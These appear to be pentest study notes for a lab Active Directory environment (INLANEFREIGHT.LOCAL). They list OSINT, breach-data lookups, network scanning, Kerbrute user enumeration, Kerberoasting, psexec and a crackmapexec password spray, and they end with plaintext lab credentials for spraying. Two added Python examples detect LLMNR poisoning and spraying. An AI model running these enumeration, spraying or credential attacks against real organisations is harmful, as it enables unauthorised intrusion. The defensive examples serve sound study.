External and Internal Enumeration

These notes cover the external reconnaissance and internal enumeration process for assessing INLANEFREIGHT.LOCAL, LOGISTICS.INLANEFREIGHT.LOCAL, and FREIGHTLOGISTICS.LOCAL within the 172.16.5.0/23 network. The work is conducted from an unauthenticated Linux host (ea-attack01) and focuses on identifying hosts, services, users, and vulnerabilities in order to establish a foothold, using passive and active techniques while staying within the grey-box scope.

External Reconnaissance

Purpose

  • Validate scope (inlanefreight.com, 172.16.5.0/23).

  • Identify public data (IPs, domains, credentials) for internal testing.

  • Avoid out-of-scope interactions (e.g., https://www.inlanefreight.com).

Actions and Commands

| Data Point | Tool/Command | Purpose |
| --- | --- | --- |
| IP Scope | nslookup ns1.inlanefreight.com; nslookup ns2.inlanefreight.com; BGP Toolkit, ViewDNS.info | Validate IPs and hosting |
| Domains | dig inlanefreight.com ANY; Google Dork: site:*.inlanefreight.com | Identify subdomains, services |
| Schema | Google Dork: intext:"@inlanefreight.com"; linkedin2username -c Inlanefreight -o usernames.txt | Discover username format |
| Data Disclosures | Google Dork: filetype:pdf inurl:inlanefreight.com; exiftool corporate_goals.pdf; trufflehog github --org=inlanefreight | Find sensitive files/repos |
| Breach Data | h8mail -t emma.williams@inlanefreight.com -o output.csv; dehashed.py -q inlanefreight.local -p | Identify leaked credentials |

Internal Enumeration

Purpose

  • Identify live hosts, services, and users in 172.16.5.0/23.

  • Discover vulnerabilities and valid AD users for foothold attempts.

  • Document findings for attacks (e.g., password spraying).

Passive Enumeration

| Tool | Command | Purpose | Findings |
| --- | --- | --- | --- |
| Wireshark | sudo -E wireshark (filter ARP, MDNS on ens224) | Capture traffic | Hosts: 172.16.5.5, 172.16.5.25, 172.16.5.50, 172.16.5.100, 172.16.5.125; ACADEMY-EA-WEB01.local |
| tcpdump | sudo tcpdump -i ens224 -w initial_traffic.pcap | CLI traffic capture | Confirms ARP/MDNS traffic |
| Responder | sudo responder -I ens224 -A | Analyze LLMNR/NBT-NS (listen only) | Additional hosts: 172.16.5.200, 172.16.5.225; ACADEMY-EA-DC01 |
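Responder in analyze mode (-A) only listens for LLMNR/NBT-NS name requests. A defender can use the same protocol to check whether anyone on the segment is already poisoning it: multicast an LLMNR query for a name that cannot exist and treat any answer as evidence of a poisoner. The following is an added example written for these notes, not a tool from the original page; it builds and parses LLMNR messages (DNS wire format over UDP 5355 to 224.0.0.252, per RFC 4795), and the reply bytes, the canary name and the IP 172.16.5.250 are constructed so the example runs offline. Only send_canary() touches the network, and it is not called by default.

```python
"""LLMNR poisoning canary check (added example; not part of the original notes)."""
import random
import socket
import struct

LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355


def build_llmnr_query(name, txid):
    """Encode one A-record query for `name` (flags=0, QDCOUNT=1)."""
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split("."))
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def _read_name(data, offset):
    """Decode a DNS-style name at `offset`, following compression pointers."""
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0 == 0xC0:  # a 2-byte pointer ends the name
            ptr = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            tail, _ = _read_name(data, ptr)
            labels.append(tail)
            return ".".join(labels), offset + 2
        offset += 1
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def parse_llmnr_response(data, expected_txid):
    """Return [(name, ipv4)] for the A answers in a response to `expected_txid`."""
    if len(data) < 12:
        return []
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if txid != expected_txid or not flags & 0x8000:  # QR bit must be set
        return []
    offset = 12
    for _ in range(qdcount):  # skip the echoed question(s)
        _, offset = _read_name(data, offset)
        offset += 4
    answers = []
    for _ in range(ancount):
        name, offset = _read_name(data, offset)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, socket.inet_ntoa(rdata)))
    return answers


def poisoners_for(canary_name, txid, responses):
    """IPs that claimed a name which does not exist: every answer is suspect."""
    hits = set()
    for data in responses:
        for name, ip in parse_llmnr_response(data, txid):
            if name.lower() == canary_name.lower():
                hits.add(ip)
    return sorted(hits)


def send_canary(canary_name, timeout=2.0):
    """Live probe: multicast the query and collect raw replies (not run offline)."""
    txid = random.randrange(0x10000)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(canary_name, txid), (LLMNR_GROUP, LLMNR_PORT))
    replies = []
    try:
        while True:
            data, _ = sock.recvfrom(4096)
            replies.append(data)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return poisoners_for(canary_name, txid, replies)


# Constructed reply for the offline run: txid 0x1a2b, QR=1, one echoed question,
# one A answer whose name is a pointer (0xc00c) back to the question, claiming
# the made-up address 172.16.5.250.
CANARY_NAME = "canary-x9q"
CANARY_TXID = 0x1A2B
CONSTRUCTED_REPLY = (
    b"\x1a\x2b\x80\x00\x00\x01\x00\x01\x00\x00\x00\x00"
    + b"\x0acanary-x9q\x00\x00\x01\x00\x01"
    + b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x1e\x00\x04\xac\x10\x05\xfa"
)

if __name__ == "__main__":
    print("poisoners:", poisoners_for(CANARY_NAME, CANARY_TXID, [CONSTRUCTED_REPLY]))
```

The canary name must be one that no legitimate host answers for, so a hit is unambiguous; the lasting fix on the hosts that keep broadcasting such requests is to disable LLMNR and NBT-NS.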

Active Enumeration

| Tool | Command | Purpose | Findings |
| --- | --- | --- | --- |
| fping | fping -asgq 172.16.5.0/23 > live_hosts.txt | Identify live hosts | 9 hosts: 172.16.5.5, 172.16.5.25, etc. |
| Nmap | sudo nmap -v -A -iL live_hosts.txt -oN host-enum | Scan services/OS | 172.16.5.5: DC (ACADEMY-EA-DC01), Kerberos, LDAP, SMB; 172.16.5.100: Server 2008 R2, MSSQL 2008 R2, weak SMBv2, HTTP TRACE |
| Kerbrute | kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users | Enumerate users | 56 valid users (e.g., jjones, jhermann, wshepherd) |

Potential Attack Vectors

| Target | Command | Purpose |
| --- | --- | --- |
| SYSTEM Access | psexec.py INLANEFREIGHT.LOCAL/user:password@172.16.5.100 | Exploit Server 2008 R2 (EternalBlue, client approval needed) |
| AD Enumeration | sharphound.exe -c All; Get-DomainUser | Use credentials for BloodHound/PowerView |
| Kerberoasting | GetUserSPNs.py INLANEFREIGHT.LOCAL/user:password@172.16.5.5 -request | Extract TGS tickets |
| Password Spraying | crackmapexec smb 172.16.5.0/23 -u valid_ad_users.txt -p 'Summer2025!' | Test common passwords |
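Both the Kerbrute user enumeration above and the password spray in this table leave a characteristic trace on the domain controller, and the detection for both is the same shape: many distinct account names from one source in a short window. kerbrute userenum sends an AS-REQ per candidate name, so the DC logs event 4768 with status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) for every name that does not exist; a spray produces authentication failures for many different existing accounts (4771 status 0x18 for Kerberos pre-auth, or 4776/4625 with 0xC000006A for NTLM, which is what crackmapexec smb uses by default). The following is an added example written for these notes, not a tool from the original page. The log lines are constructed in a simplified CSV shape (timestamp,event_id,user,status,source_ip) rather than real Windows event XML; the source IP 172.16.5.240 and the account names other than jjones, jhermann and wshepherd are made up.

```python
"""Detect user enumeration and password spraying in DC logon events
(added example; not part of the original notes)."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)
ENUM_THRESHOLD = 5    # distinct non-existent names from one IP inside WINDOW
SPRAY_THRESHOLD = 5   # distinct real accounts with bad creds from one IP inside WINDOW

# (event_id, status) pairs; statuses are compared lower-cased
UNKNOWN_USER = {("4768", "0x6"), ("4776", "0xc0000064"), ("4625", "0xc0000064")}
BAD_PASSWORD = {("4771", "0x18"), ("4776", "0xc000006a"), ("4625", "0xc000006a")}


def parse_events(lines):
    """Parse the constructed CSV shape into dicts sorted by timestamp."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, eid, user, status, src = [f.strip() for f in line.split(",")]
        events.append({"ts": datetime.fromisoformat(ts), "eid": eid,
                       "user": user.lower(), "status": status.lower(), "src": src})
    return sorted(events, key=lambda e: e["ts"])


def detect(events):
    """Return {source_ip: {"enumeration": [names], "spray": [accounts]}}.

    For each source a WINDOW is slid over its events and the largest set of
    distinct names per signal is kept; a source is reported only when a signal
    reaches its threshold.  Repeated failures for ONE account (a user
    mistyping a password) never trip the spray rule, because it counts
    distinct accounts rather than attempts.
    """
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    alerts = {}
    for src, evs in by_src.items():
        best_enum, best_spray = set(), set()
        for i, start in enumerate(evs):
            unknown, bad = set(), set()
            for e in evs[i:]:
                if e["ts"] - start["ts"] > WINDOW:
                    break
                key = (e["eid"], e["status"])
                if key in UNKNOWN_USER:
                    unknown.add(e["user"])
                elif key in BAD_PASSWORD:
                    bad.add(e["user"])
            if len(unknown) > len(best_enum):
                best_enum = unknown
            if len(bad) > len(best_spray):
                best_spray = bad
        report = {}
        if len(best_enum) >= ENUM_THRESHOLD:
            report["enumeration"] = sorted(best_enum)
        if len(best_spray) >= SPRAY_THRESHOLD:
            report["spray"] = sorted(best_spray)
        if report:
            alerts[src] = report
    return alerts


# Constructed sample: a burst of unknown names (enumeration), a burst of bad
# passwords across distinct real accounts (spray), and benign noise that must
# not be flagged (one normal TGT, one user failing three times).
SAMPLE_LOG = """
# timestamp,event_id,user,status,source_ip
2025-06-02T09:58:00,4768,jjones,0x0,172.16.5.25
2025-06-02T10:00:01,4768,aaron.smith,0x6,172.16.5.240
2025-06-02T10:00:01,4768,abby.jones,0x6,172.16.5.240
2025-06-02T10:00:02,4768,adam.brown,0x6,172.16.5.240
2025-06-02T10:00:02,4768,alan.white,0x6,172.16.5.240
2025-06-02T10:00:03,4768,alex.green,0x6,172.16.5.240
2025-06-02T10:00:03,4768,amy.black,0x6,172.16.5.240
2025-06-02T10:12:10,4771,wshepherd,0x18,172.16.5.50
2025-06-02T10:12:25,4771,wshepherd,0x18,172.16.5.50
2025-06-02T10:12:40,4771,wshepherd,0x18,172.16.5.50
2025-06-02T10:30:00,4776,jjones,0xC000006A,172.16.5.240
2025-06-02T10:30:00,4776,jhermann,0xC000006A,172.16.5.240
2025-06-02T10:30:01,4776,wshepherd,0xC000006A,172.16.5.240
2025-06-02T10:30:01,4771,bgriffin,0x18,172.16.5.240
2025-06-02T10:30:02,4771,kbaker,0x18,172.16.5.240
2025-06-02T10:30:02,4625,lwallace,0xC000006A,172.16.5.240
"""

if __name__ == "__main__":
    for src, report in detect(parse_events(SAMPLE_LOG.splitlines())).items():
        print(src, report)
```

The thresholds and window are deliberately small for the sample; in production they are tuned to the environment, and the enumeration rule in particular benefits from a low threshold because legitimate clients almost never request tickets for names that do not exist.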

Notes

  • Save outputs: initial_traffic.pcap, live_hosts.txt, host-enum.*, valid_ad_users.txt.

  • Log findings (IPs, hostnames, users, vulnerabilities) in a notetaking tool.

  • Validate vulnerabilities (e.g., 172.16.5.100) with client before exploitation.

  • Use credentials (roger.grimes:Ilovefishing!, jane.yu:Starlight1982_!) for spraying or AD enumeration.
